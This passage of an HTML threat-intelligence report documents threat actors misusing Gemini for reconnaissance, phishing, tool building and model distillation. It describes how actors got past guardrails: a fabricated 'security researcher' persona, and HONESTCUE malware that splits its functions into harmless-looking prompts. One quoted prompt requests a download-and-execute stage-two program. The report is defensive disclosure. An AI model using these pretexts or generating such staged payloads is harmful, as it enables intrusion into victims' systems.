questions suggests an attempt to replicate Gemini's reasoning ability in non-English target languages across a wide variety of tasks.</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Outcome</strong><span style="vertical-align: baseline;">: Google systems recognized this attack in real time and lowered the risk of this particular attack, protecting internal reasoning traces.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Table 1: Results of campaign analysis</span></span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Model Extraction and Distillation Attack Risks</span></h4> <p><span style="vertical-align: baseline;">Model extraction and distillation attacks do not typically represent a risk to average users, as they do not threaten the confidentiality, availability, or integrity of AI services. Instead, the risk is concentrated among model developers and service providers.</span></p> <p><span style="vertical-align: baseline;">Organizations that provide AI models as a service should monitor API access for extraction or distillation patterns. For example, a custom model tuned for financial data analysis could be targeted by a commercial competitor seeking to create a derivative product, or a coding model could be targeted by an adversary wishing to replicate capabilities in an environment without guardrails.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Mitigations</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="font-style: italic; vertical-align: baseline;">Model extraction attacks </span><a href="https://ai.google.dev/gemini-api/terms#:~:text=You%20may%20not%20use%20the,(e.g.%2C%20parameter%20weights)." rel="noopener" target="_blank"><span style="font-style: italic; text-decoration: underline; vertical-align: baseline;">violate Google's Terms of Service</span></a><span style="font-style: italic; vertical-align: baseline;"> and may be subject to takedowns and legal action. Google continuously detects, disrupts, and mitigates model extraction activity to protect proprietary logic and specialized training data, including with real-time proactive defenses that can degrade student model performance. We are sharing a broad view of this activity to help raise awareness of the issue for organizations that build or operate their own custom models.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Highlights of AI-Augmented Adversary Activity</span></h3> <p><span style="vertical-align: baseline;">A </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"><span style="text-decoration: underline; vertical-align: baseline;">consistent finding</span></a><span style="vertical-align: baseline;"> over the past year is that government-backed attackers misuse Gemini for coding and scripting tasks, gathering information about potential targets, researching publicly known vulnerabilities, and enabling post-compromise activities. In Q4 2025, GTIG's understanding of how these efforts translate into real-world operations improved as we saw direct and indirect links between threat actor misuse of Gemini and activity in the wild.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gtig-ai-threat-tracker-feb26-fig2.max-1000x1000.jpg" alt="Threat actors are leveraging AI across all stages of the attack cycle"> </a> <figcaption class="article-image__caption "><p data-block-key="ojqxz">Figure 2: Threat actors are leveraging AI across all stages of the attack lifecycle</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Supporting Reconnaissance and Target Development </span></h4> <p><span style="vertical-align: baseline;">APT actors used Gemini to support several phases of the attack lifecycle, including a focus on reconnaissance and target development to facilitate initial compromise. This activity underscores a shift toward AI-augmented phishing enablement, where the speed and accuracy of LLMs can bypass the manual labor traditionally required for victim profiling. Beyond generating content for phishing lures, LLMs can serve as a strategic force multiplier during the reconnaissance phase of an attack, allowing threat actors to rapidly synthesize open-source intelligence (OSINT) to profile high-value targets, identify key decision-makers within defense sectors, and map organizational hierarchies. By integrating these tools into their workflow, threat actors can move from initial reconnaissance to active targeting at a faster pace and broader scale.  </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">UNC6418</strong><span style="vertical-align: baseline;">, an unattributed threat actor, misused Gemini to conduct targeted intelligence gathering, specifically seeking out sensitive account credentials and email addresses. Shortly after, GTIG observed the threat actor target all these accounts in a phishing campaign focused on Ukraine and the defense sector. Google has taken action against this actor by disabling the assets associated with this activity.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Temp.HEX, </strong><span style="vertical-align: baseline;">a PRC-based threat actor, misused Gemini and other AI tools to compile detailed information on specific individuals, including targets in Pakistan, and to collect operational and structural data on separatist organizations in various countries. While we did not see direct targeting as a result of this research, shortly after the threat actor included similar targets in Pakistan in their campaign. Google has taken action against this actor by disabling the assets associated with this activity.</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Phishing Augmentation</span></h3> <p><span style="vertical-align: baseline;">Defenders and targets have long relied on indicators such as poor grammar, awkward syntax, or lack of cultural context to help identify phishing attempts. Increasingly, threat actors now leverage LLMs to generate hyper-personalized, culturally nuanced lures that can mirror the professional tone of a target organization or local language. </span></p> <p><span style="vertical-align: baseline;">This capability extends beyond simple email generation into "rapport-building phishing," where models are used to maintain multi-turn, believable conversations with victims to build trust before a malicious payload is ever delivered. By lowering the barrier to entry for non-native speakers and automating the creation of high-quality content, adversaries can largely erase those "tells" and improve the effectiveness of their social engineering efforts.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The Iranian government-backed actor </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations"><strong style="text-decoration: underline; vertical-align: baseline;">APT42</strong></a><span style="vertical-align: baseline;"> leveraged generative AI models, including Gemini, to significantly augment reconnaissance and targeted social engineering. APT42 misuses Gemini to search for official emails for specific entities and conduct reconnaissance on potential business partners to establish a credible pretext for an approach. This includes attempts to enumerate the official email addresses for specific entities and to conduct research to establish a credible pretext for an approach. By providing Gemini with the biography of a target, APT42 misused Gemini to craft a good persona or scenario to get engagement from the target. As with many threat actors tracked by GTIG, APT42 uses Gemini to translate into and out of local languages, as well as to better understand non-native-language phrases and references. Google has taken action against this actor by disabling the assets associated with this activity.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The North Korean government-backed actor </span><strong style="vertical-align: baseline;">UNC2970</strong><span style="vertical-align: baseline;"> has consistently focused on defense targeting and impersonating corporate recruiters in their campaigns. The group used Gemini to synthesize OSINT and profile high-value targets to support campaign planning and reconnaissance. This actor's target profiling included searching for information on major cybersecurity and defense companies and mapping specific technical job roles and salary information. This activity blurs the distinction between routine professional research and malicious reconnaissance, as the actor gathers the necessary components to create tailored, high-fidelity phishing personas and identify potential soft targets for initial compromise. Google has taken action against this actor by disabling the assets associated with this activity. </span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Threat Actors Continue to Use AI to Support Coding and Tooling Development </span></h4> <p><span style="vertical-align: baseline;">State-sponsored actors continue to misuse Gemini to enhance all stages of their operations, from reconnaissance and phishing lure creation to command-and-control (C2 or C&amp;C) development and data exfiltration. We have also observed activity demonstrating an interest in using agentic AI capabilities to support campaigns, such as prompting Gemini with an expert cybersecurity persona, or attempting to create an AI-integrated code auditing capability.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Agentic AI refers to artificial intelligence systems engineered to operate with a high degree of autonomy, capable of reasoning through complex tasks, making independent decisions, and executing multi-step actions without constant human oversight. Cyber criminals, nation-state actors, and hacktivist groups are showing a growing interest in leveraging agentic AI for malicious purposes, including automating spear-phishing attacks, developing sophisticated malware, and conducting disruptive campaigns. While we have detected a tool, AutoGPT, advertising the alleged generation and maintenance of autonomous agents, we have not yet seen evidence of these capabilities being used in the wild. However, we do anticipate that more tools and services claiming to contain agentic AI capabilities will likely enter the underground market.</span><strong style="vertical-align: baseline;"> </strong></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><p><strong style="vertical-align: baseline;">APT31 </strong><span style="vertical-align: baseline;">employed a highly structured approach by prompting Gemini with an expert cybersecurity persona to automate the analysis of vulnerabilities and generate targeted testing plans. The PRC-based threat actor fabricated a scenario, in one case trialing Hexstrike MCP tooling, and directing the model to analyze remote code execution (RCE), web application firewall (WAF) bypass techniques, and SQL injection test results against specific US-based targets. This automated intelligence gathering to identify technological vulnerabilities and organizational defense weaknesses. This activity explicitly blurs the line between a routine security assessment query and a targeted malicious reconnaissance operation. Google has taken action against this actor by disabling the assets associated with this activity.</span></p></div> <div class="block-paragraph_advanced"><div align="left" style="text-align: center;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table style="margin-left: auto; margin-right: auto;"><colgroup><col/></colgroup> <tbody> <tr style="text-align: center;"> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">”</span><code style="vertical-align: baseline;">I'm a security researcher who is trialling out the hexstrike MCP tooling</code><span style="vertical-align: baseline;">.”</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">Threat actors fabricated scenarios, potentially in order to generate penetration test prompts. </span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 3: Sample of APT31 prompting</span></span></div></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gtig-ai-threat-tracker-feb26-fig4a.max-1000x1000.png" alt="APT31&#x27;s misuse of Gemini mapped across the attack lifecycle"> </a> <figcaption class="article-image__caption "><p data-block-key="ho69d">Figure 4: APT31's misuse of Gemini mapped across the attack lifecycle</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><strong style="vertical-align: baseline;">UNC795</strong><span style="vertical-align: baseline;">, a PRC-based actor, relied heavily on Gemini throughout their entire attack lifecycle. GTIG observed the group consistently engaging with Gemini multiple days a week to troubleshoot their code, conduct research, and generate technical capabilities for their intrusion activity. The threat actor's activity triggered safety systems, and Gemini did not comply with the actor's attempts to create policy-violating capabilities. </span></p> <p><span style="vertical-align: baseline;">The group also employed Gemini to create an AI-integrated code auditing capability, likely demonstrating an interest in agentic AI utilities to support their intrusion activity. Google has taken action against this actor by disabling the assets associated with this activity.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/gtig-ai-threat-tracker-feb26-fig5a.png" alt="UNC795&#x27;s misuse of Gemini mapped across the attack lifecycle"> </a> <figcaption class="article-image__caption "><p data-block-key="ho69d">Figure 5: UNC795's misuse of Gemini mapped across the attack lifecycle</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">We observed activity likely associated with the PRC-based threat actor </span><strong style="vertical-align: baseline;">APT41, </strong><span style="vertical-align: baseline;">which leveraged Gemini to accelerate the development and deployment of malicious tooling, including for knowledge synthesis, real-time troubleshooting, and code translation. In particular, multiple times the actor gave Gemini open-source tool README pages and asked for explanations and use case examples for specific tools. Google has taken action against this actor by disabling the assets associated with this activity.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/gtig-ai-threat-tracker-feb26-fig6a.png" alt="APT41&#x27;s misuse of Gemini mapped across the attack lifecycle"> </a> <figcaption class="article-image__caption "><p data-block-key="ho69d">Figure 6: APT41's misuse of Gemini mapped across the attack lifecycle</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In addition to leveraging Gemini for the aforementioned social engineering campaigns, the Iranian threat actor </span><strong style="vertical-align: baseline;">APT42</strong><span style="vertical-align: baseline;"> uses Gemini as an engineering platform to accelerate the development of specialized malicious tools. The threat actor is actively engaged in developing new malware and offensive tooling, leveraging Gemini for debugging, code generation, and researching exploitation techniques. Google has taken action against this actor by disabling the assets associated with this activity.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gtig-ai-threat-tracker-feb26-fig7a.max-1000x1000.png" alt="APT42&#x27;s misuse of Gemini mapped across the attack lifecycle"> </a> <figcaption class="article-image__caption "><p data-block-key="ho69d">Figure 7: APT42's misuse of Gemini mapped across the attack lifecycle</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Mitigations</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="font-style: italic; vertical-align: baseline;">These activities triggered Gemini's safety responses, and Google took additional, broader action to disrupt the threat actors' campaigns based on their operational security failures. Additionally, we've taken action against these actors by disabling the assets associated with this activity and making updates to prevent further misuse. Google DeepMind has used these insights to strengthen both classifiers and the model itself, enabling it to refuse to assist with these types of attacks moving forward.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Using Gemini to Support Information Operations</span></h4> <p><span style="vertical-align: baseline;">GTIG continues to observe IO actors use Gemini for productivity gains (research, content creation, localization, etc.), which aligns with their previous use of Gemini. We have identified Gemini activity that indicates threat actors are soliciting the tool to help create articles, generate assets, and aid them in coding. However, we have not identified this generated content in the wild. None of these attempts have created breakthrough capabilities for IO campaigns. Threat actors from China, Iran, Russia, and Saudi Arabia are producing political satire and propaganda to advance specific ideas across both digital platforms and physical media, such as printed posters.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Mitigations</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="font-style: italic; vertical-align: baseline;">For observed IO campaigns, we did not see evidence of successful automation or any breakthrough capabilities. These activities are similar to our findings from January 2025 that detailed how bad actors are leveraging Gemini for productivity gains, rather than novel capabilities. We took action against IO actors by disabling the assets associated with these actors' activity, and Google DeepMind used these insights to further strengthen our protections against such misuse. Observations have been used to strengthen both classifiers and the model itself, enabling it to refuse to assist with this type of misuse moving forward.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Continuing Experimentation with AI-Enabled Malware</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">GTIG continued to observe threat actors experiment with AI to implement novel capabilities in malware families in late 2025. While we have not encountered experimental AI-enabled techniques resulting in revolutionary paradigm shifts in the threat landscape, these proof-of-concept malware families are early indicators of how threat actors can implement AI techniques as part of future operations. We expect this exploratory testing will increase in the future.</span></p> <p><span style="vertical-align: baseline;">In addition to continued experimentation with novel capabilities, throughout late 2025 GTIG observed threat actors integrating conventional AI-generated capabilities into their intrusion operations such as the COINBAIT phishing kit. We expect threat actors will continue to incorporate AI throughout the attack lifecycle including: supporting malware creation, improving pre-existing malware, researching vulnerabilities, conducting reconnaissance, and/or generating lure content.</span></p> <h4><span style="vertical-align: baseline;">Outsourcing Functionality: HONESTCUE</span></h4> <p><span style="vertical-align: baseline;">In September 2025, GTIG observed malware samples, which we track as </span><a href="https://www.virustotal.com/gui/collection/69f762800d3513e19acb8fa34895a46a137168%201370417db5a1db6ee9acad3f28" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">HONESTCUE</span></a><span style="vertical-align: baseline;">, leveraging Gemini's API to outsource functionality generation. Our examination of HONESTCUE malware samples indicates the adversary's incorporation of AI is likely designed to support a multi-layered approach to obfuscation by undermining traditional network-based detection and static analysis. </span></p> <p><span style="vertical-align: baseline;">HONESTCUE is a downloader and launcher framework that sends a prompt via Google Gemini's API and receives C# source code as the response. Notably, HONESTCUE shares capabilities similar to PROMPTFLUX's "just-in-time" (JIT) technique </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"><span style="text-decoration: underline; vertical-align: baseline;">that we previously observed</span></a><span style="vertical-align: baseline;">; however, rather than leveraging an LLM to update itself, HONESTCUE calls the Gemini API to generate code that operates the "stage two" functionality, which downloads and executes another piece of malware. Additionally, the fileless secondary stage of HONESTCUE takes the C# source code received from the Gemini API and uses the legitimate .NET CSharpCodeProvider framework to compile and execute the payload directly in memory. This approach leaves no payload artifacts on the disk. We have also observed the threat actor use content delivery networks (CDNs) like Discord CDN to host the final payloads.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gtig-ai-threat-tracker-feb26-fig8.max-1000x1000.jpg" alt="HONESTCUE malware"> </a> <figcaption class="article-image__caption "><p data-block-key="173dj">Figure 8: HONESTCUE malware</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">We have not associated this malware with any existing clusters of threat activity; however, we suspect this malware is being developed by developers who possess a modicum of technical expertise. Specifically, the small iterative changes across many samples as well as the single VirusTotal submitter, potentially testing antivirus capabilities, suggests a singular actor or small group. Additionally, the use of Discord to test payload delivery and the submission of Discord Bots indicates an actor with limited technical sophistication. The consistency and clarity of the architecture coupled with the iterative progression of the examined malware samples strongly suggest this is a single actor or small group likely in the proof-of-concept stage of implementation. </span></p> <p><span style="vertical-align: baseline;">HONESTCUE's use of a hard-coded prompt is not malicious in its own right, and, devoid of any context related to malware, it is unlikely that the prompt would be considered "malicious." Outsourcing a facet of malware functionality and leveraging an LLM to develop seemingly innocuous code that fits into a bigger, malicious construct demonstrates how threat actors will likely embrace AI applications to augment their campaigns while bypassing security guardrails.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">Can you write a single, self-contained C# program? It should contain a class named AITask with a static Main method. The Main method should use System.Console.WriteLine to print the message 'Hello from AI-generated C#!' to the console. Do not include any other code, classes, or methods.</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 9: Example of a hard-coded prompt</span></p> </div></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">Write a complete, self-contained C# program with a public class named 'Stage2' and a static Main method. This method must use 'System.Net.WebClient' to download the data from the URL. It must then save this data to a temporary file in the user's temp directory using 'System.IO.Path.GetTempFileName()' and 'System.IO.File.WriteAllBytes'. Finally, it must execute this temporary file as a new process using 'System.Diagnostics.Process.Start'.</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span 